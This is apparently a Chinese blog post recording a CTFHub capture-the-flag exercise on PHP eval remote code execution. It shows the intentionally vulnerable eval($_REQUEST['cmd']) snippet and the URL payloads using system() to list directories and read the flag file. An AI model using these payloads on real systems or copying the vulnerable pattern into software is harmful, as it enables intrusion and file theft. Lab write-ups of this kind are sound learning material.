CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
宇木灵6 小时前
C语言基础-十、文件操作
c语言·开发语言·学习
QQ24391979 小时前
语言在线考试与学习交流网页平台信息管理系统源码-SpringBoot后端+Vue前端+MySQL【可直接运行】
前端·spring boot·sql·学习·java-ee
The_Uniform_C@t211 小时前
论文浅读(第三期)|摘自《UAV Resilience Against Stealthy Attacks》(第一节)
网络·物联网·学习·网络安全
青衫码上行11 小时前
高频 SQL 50题(基础版)| 查询 + 连接
数据库·sql·学习·mysql
宇木灵11 小时前
C语言基础学习-X0前置
c语言·开发语言·学习
希望之晨11 小时前
c++ 11 学习 override
开发语言·c++·学习
学编程的闹钟11 小时前
E语言组件开发全攻略
学习
winfreedoms11 小时前
Puppypi——树莓派5主板学习笔记
笔记·学习
gjf05_0512 小时前
人该怎样活着呢?版本69.2
学习
蒸蒸yyyyzwd12 小时前
cpp八股学习笔记
笔记·学习
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库05全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)06如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解07MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法08【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆09openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南10配置 OpenClaw 使用 Ollama 本地模型